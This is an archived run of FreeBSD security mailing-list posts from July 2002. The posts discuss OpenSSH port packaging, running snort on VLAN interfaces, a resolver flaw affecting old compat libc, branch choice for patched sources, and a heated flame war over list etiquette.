X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. 
Message-Id: <4.3.2.7.2.20020701102105.022a44f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 10:30:44 -0600 To: David Pick , security@FreeBSD.ORG From: Brett Glass Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 08:43 AM 7/1/2002, David Pick wrote: >At least we can build a binary update "package" >for the "ports" version using a simple "make package"; it's >harder for the version integrated into the base. You can make a binary updater using the currently available port. Just do cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE package Beware, though, that you'll also want to install the latest OpenSSL "engine". I believe that you can make this into a binary package as well. >Please note that I have *not* asked for a binary update. >I don't want to get flamed the way Brett does... ...for asking something reasonable? ;-) Seriously: Please do ask. If we do not have up-to-date binary packages, a large percentage of the new installs of FreeBSD (both network installs and those from CD-ROM) will be vulnerable from the start, even though the holes have long been identified. This is not only unethical but also terrible for FreeBSD's reputation. Already, the Apache/FreeBSD worm is making the rounds. Why allow new installs to be vulnerable? 
--Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 9:54:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B906237B400 for ; Mon, 1 Jul 2002 09:54:27 -0700 (PDT) Received: from balrog.rt.ru (balrog.rt.ru [217.107.221.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id DD48143E09 for ; Mon, 1 Jul 2002 09:54:24 -0700 (PDT) (envelope-from dima@rt.ru) Received: from rt.ru (localhost [127.0.0.1]) by balrog.rt.ru (8.9.3/8.9.3) with ESMTP id UAA29462 for ; Mon, 1 Jul 2002 20:51:52 +0400 (MSD) (envelope-from dima@rt.ru) Message-ID: <3D2088A8.CCE2540F@rt.ru> Date: Mon, 01 Jul 2002 20:51:52 +0400 From: "Dmitry S. Rzhavin" Organization: Rostelecom X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 4.0-20000103-CURRENT i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: snort + vlans Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello! I have number of vlans on my box, all of them configured on xl0. So, xl0 does not have any ip address, but it is turned up. Now I want to start snort on this box. 'snort -i what' shall I tell to make snort listen and analyze my traffic? And, if I asked about vlans... What about vtp in Free? Does Free knows vtp, how to configure it, and what vtp mode does FreeBSD operate? Thank you. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10: 5:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E6FFB37B400 for ; Mon, 1 Jul 2002 10:05:46 -0700 (PDT) Received: from web10106.mail.yahoo.com (web10106.mail.yahoo.com [216.136.130.56]) by mx1.FreeBSD.org (Postfix) with SMTP id 9FE2A43E26 for ; Mon, 1 Jul 2002 10:05:46 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020701170542.79357.qmail@web10106.mail.yahoo.com> Received: from [68.5.49.41] by web10106.mail.yahoo.com via HTTP; Mon, 01 Jul 2002 10:05:42 PDT Date: Mon, 1 Jul 2002 10:05:42 -0700 (PDT) From: twig les Subject: Re: snort + vlans To: "Dmitry S. Rzhavin" , security@FreeBSD.ORG In-Reply-To: <3D2088A8.CCE2540F@rt.ru> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That's a switch config problem, and the answer depends on your type of switch. --- "Dmitry S. Rzhavin" wrote: > Hello! > I have number of vlans on my box, all of them > configured on xl0. > So, xl0 does not have any ip address, but it is > turned up. > Now I want to start snort on this box. 'snort -i > what' shall I > tell to make snort listen and analyze my traffic? > > And, if I asked about vlans... What about vtp in > Free? Does > Free knows vtp, how to configure it, and what vtp > mode does > FreeBSD operate? > > Thank you. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. 
----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10:16:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CD46737B400 for ; Mon, 1 Jul 2002 10:16:25 -0700 (PDT) Received: from balrog.rt.ru (balrog.rt.ru [217.107.221.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id 97A4543E39 for ; Mon, 1 Jul 2002 10:16:21 -0700 (PDT) (envelope-from dima@rt.ru) Received: from rt.ru (localhost [127.0.0.1]) by balrog.rt.ru (8.9.3/8.9.3) with ESMTP id VAA29517; Mon, 1 Jul 2002 21:13:50 +0400 (MSD) (envelope-from dima@rt.ru) Message-ID: <3D208DCE.F4379E7A@rt.ru> Date: Mon, 01 Jul 2002 21:13:50 +0400 From: "Dmitry S. Rzhavin" Organization: Rostelecom X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 4.0-20000103-CURRENT i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: twig les Cc: security@FreeBSD.ORG Subject: Re: snort + vlans References: <20020701170542.79357.qmail@web10106.mail.yahoo.com> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org twig les wrote: > > That's a switch config problem, and the answer depends > on your type of switch. Cisco 2924 All vlans works well. I just wonder if snort can listen on ifaces like vlanXX. Does it? > > --- "Dmitry S. Rzhavin" wrote: > > Hello! > > I have number of vlans on my box, all of them > > configured on xl0. > > So, xl0 does not have any ip address, but it is > > turned up. > > Now I want to start snort on this box. 
'snort -i > > what' shall I > > tell to make snort listen and analyze my traffic? > > > > And, if I asked about vlans... What about vtp in > > Free? Does > > Free knows vtp, how to configure it, and what vtp > > mode does > > FreeBSD operate? > > > > Thank you. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > > the message > > ===== > ----------------------------------------------------------- > Only fools have all the answers. > ----------------------------------------------------------- > > __________________________________________________ > Do You Yahoo!? > Yahoo! - Official partner of 2002 FIFA World Cup > http://fifaworldcup.yahoo.com -- The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10:27: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7686637B400 for ; Mon, 1 Jul 2002 10:27:06 -0700 (PDT) Received: from balrog.rt.ru (balrog.rt.ru [217.107.221.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0DDB743E0A for ; Mon, 1 Jul 2002 10:27:03 -0700 (PDT) (envelope-from dima@rt.ru) Received: from rt.ru (localhost [127.0.0.1]) by balrog.rt.ru (8.9.3/8.9.3) with ESMTP id VAA29535; Mon, 1 Jul 2002 21:24:28 +0400 (MSD) (envelope-from dima@rt.ru) Message-ID: <3D20904C.8AF8703C@rt.ru> Date: Mon, 01 Jul 2002 21:24:28 +0400 From: "Dmitry S. 
Rzhavin" Organization: Rostelecom X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 4.0-20000103-CURRENT i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: mike.jablonski@abnamrousa.com, security@FreeBSD.ORG Subject: Re: snort + vlans References: <072290CFDAAC1F4A8A5853B20A9ADF4A2B0EB0@MES3> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org mike.jablonski@abnamrousa.com wrote: > > you need to enable the span port feature. > Sorry, seems my explain was too bad. I have internal FW. It is connected to cat2924 with xl0 at 100Mbit. Switch port is in trunk mode. There are 2 vlans on xl0: vlan0 and vlan1. There is no ip on xl0. My default router (cisco 26XX) is in vlan0 (trunk too). My office subnet is on vlan1 (all office hosts configured as vlan 1 on switch). So, my box works as router+FW between vlan0 and vlan1. Now it works. So, I want to setup snort to detect attacks. What iface (xl0, vlan0, or what) shall I bind snort (snort -i flag) to make it analyze both internal and external traffic? Another question is: cisco detects vlans with vtp protocol. Does FreeBSD supports it? 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10:45:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 53C0137B400; Mon, 1 Jul 2002 10:45:42 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6D80643E0A; Mon, 1 Jul 2002 10:45:39 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.4/8.12.4) with ESMTP id g61Hj64W007160; Mon, 1 Jul 2002 19:45:09 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g61Hj541007131; Mon, 1 Jul 2002 19:45:05 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG, nectar@FreeBSD.ORG Message-ID: <6WBaUgg1nC@dmeyer.dinoex.sub.org> From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: Re[2]: openssh OR openssh-portable Date: Mon, 01 Jul 2002 19:39:55 +0200 X-Mailer: Dinoex 1.77 References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> <20020701143038.GM4764@madman.nectar.cc> <20020701144043.GQ4764@madman.nectar.cc> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-Accept-Language: de,en X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. 
X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-No-Archive: yes X-ZC-VIA: 20020701000000S+2@dinoex.sub.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jacques A. Vidrine wrote: > On Mon, Jul 01, 2002 at 04:37:23PM +0200, Dag-Erling Smorgrav wrote: > > "Jacques A. Vidrine" writes: > > > Of course, OpenSSH 3.4 is always available via the Ports Collection, > > > and I would, in fact, recommend that users take advantage of it and > > > turn on PrivilegeSeparation if at all possible. > > > > I wouldn't - the port needs quite a bit of work and is too much of a > > moving target right now :( > > I'll have us agree by defining `if at all possible' to include a stable, > working OpenSSH port :-) > > I'm sure Dirk is ready and willing to fix any problems that crop up. > I think that the port currently provides the functionality needed by a > large cross-section of users. Sure, if you find any problem, let me know. I try to sync my patches with current, but I can't test all configurations/options. I think I need a testbed / regression test, where we can test at least the FreeBSD extensions to work as expected. Any urgent functions needed we might copy from cvs and add as patches to the ports. 
kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10:53: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D290237B400 for ; Mon, 1 Jul 2002 10:53:02 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id E681C43E0A for ; Mon, 1 Jul 2002 10:53:01 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 3E34134; Mon, 1 Jul 2002 12:53:01 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g61Hr14N009088; Mon, 1 Jul 2002 12:53:01 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g61Hr04t009087; Mon, 1 Jul 2002 12:53:00 -0500 (CDT) Date: Mon, 1 Jul 2002 12:53:00 -0500 From: "Jacques A. Vidrine" To: "Lachlan O'Dea" Cc: freebsd-security@freebsd.org Subject: Re: resolv and dynamic linking to compat libc Message-ID: <20020701175300.GG8128@madman.nectar.cc> Mail-Followup-To: "Jacques A. 
Vidrine" , Lachlan O'Dea , freebsd-security@freebsd.org References: <3D1AA5F2.9020305@ca.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D1AA5F2.9020305@ca.com> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 03:43:14PM +1000, Lachlan O'Dea wrote: > Hi, > > With regard the resolv vulnerability, is there any issue with older > binaries that are linking against an older libc.so? For example, on my > box I have a /usr/lib/compat/libc.so.3. Will a make world fix this > library as well? No, I'm afraid not. libc.so.3 will not be rebuilt in the usual sense of the word, thus leaving binaries that link against it vulnerable. I don't have a solution for you at the moment, but once we've patched RELENG_3 (FreeBSD 3.x), then perhaps we'll be able to get there. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . 
nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11: 2:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9FA5F37B400 for ; Mon, 1 Jul 2002 11:02:54 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7153E43E0A for ; Mon, 1 Jul 2002 11:02:53 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g61I2rJU093485 for ; Mon, 1 Jul 2002 11:02:53 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g61I2rid093481 for security@freebsd.org; Mon, 1 Jul 2002 11:02:53 -0700 (PDT) Date: Mon, 1 Jul 2002 11:02:53 -0700 (PDT) Message-Id: <200207011802.g61I2rid093481@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11:14:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 03EC337B400; Mon, 1 Jul 2002 11:14:20 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP 
id CF56543E09; Mon, 1 Jul 2002 11:14:18 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA06618; Mon, 1 Jul 2002 12:14:07 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701120628.023147e0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 12:14:00 -0600 To: "Jacques A. Vidrine" , "Lachlan O'Dea" From: Brett Glass Subject: Re: resolv and dynamic linking to compat libc Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020701175300.GG8128@madman.nectar.cc> References: <3D1AA5F2.9020305@ca.com> <3D1AA5F2.9020305@ca.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:53 AM 7/1/2002, Jacques A. Vidrine wrote: >No, I'm afraid not. libc.so.3 will not be rebuilt in the usual sense >of the word, thus leaving binaries that link against it vulnerable. In that case, has the binary package including it been taken offline? It's unethical to leave it where it might be downloaded. 
--Brett

From owner-freebsd-security Mon Jul 1 11:15:33 2002
Date: Mon, 1 Jul 2002 20:15:27 +0200
To: Dag-Erling Smorgrav
Cc: Chris Johnson, security@freebsd.org
Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current.
From: lupe@lupe-christoph.de (Lupe Christoph)

On Monday, 2002-07-01 at 16:01:34 +0200, Dag-Erling Smorgrav wrote:

> I don't care about the port. Personally, I'd rather it didn't exist,
> and I think admins who install it need to have their head checked.

May I ask you to join the OpenBSD crowd? You'd fit right in.

(Ducks and runs from crossfire.)

Lupe Christoph
--
| lupe@lupe-christoph.de | http://www.lupe-christoph.de/ |
| I have challenged the entire ISO-9000 quality assurance team to a |
| Bat-Leth contest on the holodeck. They will not concern us again. |
| http://public.logica.com/~stepneys/joke/klingon.htm |

From owner-freebsd-security Mon Jul 1 11:18:10 2002
Date: Mon, 1 Jul 2002 20:18:06 +0200
To: Dag-Erling Smorgrav
Cc: Eric Anderson, freebsd-security@freebsd.org
Subject: Re: SSH Patches
From: lupe@lupe-christoph.de (Lupe Christoph)

On Monday, 2002-07-01 at 16:07:44 +0200, Dag-Erling Smorgrav wrote:

> Eric Anderson writes:
> > Heheheh. I won't argue with you there. However, still better than MS's:
> > No default install without a remote root in over 20 years.
> I think you're wrong here. They didn't have a networking stack before
> Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten
> years.

So it's no remote in a default install for the first ten years?

Lupe Christoph
--
| lupe@lupe-christoph.de | http://www.lupe-christoph.de/ |
| I have challenged the entire ISO-9000 quality assurance team to a |
| Bat-Leth contest on the holodeck. They will not concern us again. |
| http://public.logica.com/~stepneys/joke/klingon.htm |

From owner-freebsd-security Mon Jul 1 11:21: 4 2002
Date: Mon, 1 Jul 2002 14:20:58 -0400 (EDT)
From: Ralph Huntington
Subject: security fixes

With all the traffic surrounding these recent vulnerabilities, it's a
little confusing to know what one has to do and need not do. Let me ask
this one question, please:

In cvsup'ing the patched sources, if I have a 4.6-RELEASE box, should I
cvsup RELENG_4_6 and for the earlier 4.x machines cvsup RELENG_4 ???

Or should they all get RELENG_4 ?

Thank you, Ralph

From owner-freebsd-security Mon Jul 1 11:22:44 2002
Date: Mon, 1 Jul 2002 13:22:34 -0500
From: "Jacques A. Vidrine"
To: Brett Glass
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: resolv and dynamic linking to compat libc

On Mon, Jul 01, 2002 at 12:14:00PM -0600, Brett Glass wrote:
> At 11:53 AM 7/1/2002, Jacques A. Vidrine wrote:
>
> >No, I'm afraid not. libc.so.3 will not be rebuilt in the usual sense
> >of the word, thus leaving binaries that link against it vulnerable.
>
> In that case, has the binary package including it been taken offline?

No.

> It's unethical to leave it where it might be downloaded.

Gee, I guess we better get cracking to take offline every previous
version of libc, too --- which would mean every version of FreeBSD and
who knows what else. Hmm, and any applications that may have been
statically linked with any of them. How about you help out by
enumerating every copy on the Internet, along with contact information
for each? That would be much appreciated. Thanks.

--
Jacques A. Vidrine http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

From owner-freebsd-security Mon Jul 1 11:32: 0 2002
Date: Mon, 01 Jul 2002 13:31:48 -0500
From: Eric Anderson
To: Lupe Christoph
Cc: freebsd-security@freebsd.org
Subject: Re: SSH Patches

Lupe Christoph wrote:
>
> > > No default install without a remote root in over 20 years.
>
> > I think you're wrong here. They didn't have a networking stack before
> > Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten
> > years.
>
> So it's no remote in a default install for the first ten years?

Wo! Read it again:

No default install without a remote root in over 20 years.

should be:

No default install without a remote root in over 10 years.

The other way would be very wrong (remember, we are talking about the
big evil here).

Eric

--
------------------------------------------------------------------
Eric Anderson Systems Administrator Centaur Technology
He who laughs last didn't get the joke.
------------------------------------------------------------------

From owner-freebsd-security Mon Jul 1 11:34: 3 2002
Date: Mon, 1 Jul 2002 14:33:59 -0400
Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current.
From: Bryan Fullerton
To: freebsd-security@FreeBSD.ORG

On Monday, July 1, 2002, at 10:01 AM, Dag-Erling Smorgrav wrote:

> I don't care about the port. Personally, I'd rather it didn't exist,
> and I think admins who install it need to have their head checked.

So the OpenSSH included with 4.6-RELEASE-p1 is as secure or more secure
than the port install of OpenSSH 3.4p1? If this is the case I'll switch
back to the base install and delete the port.

Bryan

From owner-freebsd-security Mon Jul 1 11:50:51 2002
Date: Mon, 1 Jul 2002 14:50:47 -0400 (EDT)
From: Garrett Wollman
To: Dag-Erling Smorgrav
Cc: security@FreeBSD.ORG
Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current.

< said:

> I don't care about the port. Personally, I'd rather it didn't exist,
> and I think admins who install it need to have their head checked.

I don't care about the base-install ssh. Personally, I'd rather it
didn't exist, and I think admins who install it need to have their
heads checked.

So there!

-GAWollman

From owner-freebsd-security Mon Jul 1 12: 1:41 2002
From: "Jesse"
To: "Garrett Wollman"
Subject: RE: security risk: ktrace(2) in FreeBSD prior to -current.
Date: Mon, 1 Jul 2002 12:01:33 -0700

Please, everyone, I use this list to track _important_ security issues
dealing with both production and personal machines. Do you know what LOW
VOLUME means?

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Garrett Wollman
Sent: Monday, July 01, 2002 11:51 AM
To: Dag-Erling Smorgrav
Cc: security@FreeBSD.ORG
Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current.

< said:

> I don't care about the port. Personally, I'd rather it didn't exist,
> and I think admins who install it need to have their head checked.

I don't care about the base-install ssh. Personally, I'd rather it
didn't exist, and I think admins who install it need to have their
heads checked.

So there!

-GAWollman

From owner-freebsd-security Mon Jul 1 12: 5:17 2002
From: Kenneth Smith
Date: Mon, 1 Jul 2002 15:01:16 -0400 (EDT)
Subject: Re: snort + vlans
To: dima@rt.ru
Cc: security@FreeBSD.ORG

Dmitry:

Have you looked at the IOS "port monitor" command? It is not clear what
you are referring to when you say "my box," but I would be careful if you
are using vlan's to separate your unsecured and secured LAN's.

ks

> mike.jablonski@abnamrousa.com wrote:
>>
>> you need to enable the span port feature.
>>
>
> Sorry, seems my explain was too bad.
> I have internal FW. It is connected to cat2924
> with xl0 at 100Mbit.
> Switch port is in trunk mode.
> there is 2 vlans on xl0: vlan0 and vlan1.
> There is no ip on xl0.
> My defaultouter (cisco 26XX) is in vlan0 (trunk too).
> My office subnet is on vlan1 (all office hosts
> configured as vlan 1 on switch).
>
> So, my box works as router+FW between vlan0 and vlan1.
> Now it works.
>
> So, I want to setup snort to detect attacks.
> What iface (xl0, vlan0, or what) shall I bind snort
> (snort -i flag) to make it analyze both internal
> and external traffic?
>
> Another question is: cisco detects vlans with vtp
> protocol. Does FreeBSD supports it?

From owner-freebsd-security Mon Jul 1 12:20:53 2002
From: "Jeremy Suo-Anttila"
To: "Jesse", "Garrett Wollman"
Subject: RE: security risk: ktrace(2) in FreeBSD prior to -current.
Date: Mon, 1 Jul 2002 14:27:00 -0500

There is no such thing as low volume with people like Brett Glass on
here. I would love to have this list setup to ONLY send out
notifications. I think that 90% of the mail I get from here is flame wars
between Brett and someone whose toes he has stepped on again.

Also Brett no hard feelings but I believe a lot of your questions /
concerns should be placed on -questions or -chat there really is no need
for these never ending threads that we have all been seeing lately. There
is so much flaming going on I swear I am going to miss a valid security
posting since there is so much crap coming into my mailbox.

I really do not care how YOU feel FreeBSD is setup or why a certain
packages / ports have not been made to fit your NEEDS this is FreeBSD if
you don't like the way it's done stop bitching, moaning, crying and having
a general hissy fit about it all and code the fixes yourself. NO ONE says
you have to use FreeBSD so if you really do not like the way the updates
and patch system works go use something else.

Also I really do not care that you have a zillion machines running
various types of FreeBSD and other embedded OS's. That is not our problem
and if you are concerned about how you are going to protect and update
them maybe you should have taken that into consideration when you
purchased the equipment and you may have steered away from a embedded
*blackbox* type devices.

Did you ever stop to think that if you actually STFU for a couple of days
maybe the developers could fix the problems and not have to deal with
responding to your tired ass questions.

Also please respond to me in CC since I do not wish to waste anyone's
bandwidth.

Thanks

Jps

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Jesse
Sent: Monday, July 01, 2002 2:02 PM
To: Garrett Wollman
Cc: security@FreeBSD.ORG
Subject: RE: security risk: ktrace(2) in FreeBSD prior to -current.

Please, everyone, I use this list to track _important_ security issues
dealing with both production and personal machines. Do you know what LOW
VOLUME means?

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Garrett Wollman
Sent: Monday, July 01, 2002 11:51 AM
To: Dag-Erling Smorgrav
Cc: security@FreeBSD.ORG
Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current.

< said:

> I don't care about the port. Personally, I'd rather it didn't exist,
> and I think admins who install it need to have their head checked.

I don't care about the base-install ssh. Personally, I'd rather it
didn't exist, and I think admins who install it need to have their
heads checked.

So there!

-GAWollman

From owner-freebsd-security Mon Jul 1 12:25:53 2002
Date: Mon, 01 Jul 2002 14:25:42 -0500
From: Anthony Rubin
To: jps@funeralexchange.com
Cc: Jesse, Garrett Wollman, security@FreeBSD.ORG
Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current.

Jeremy,

It sounds like you should subscribe to freebsd-security-notifications
instead of freebsd-security.

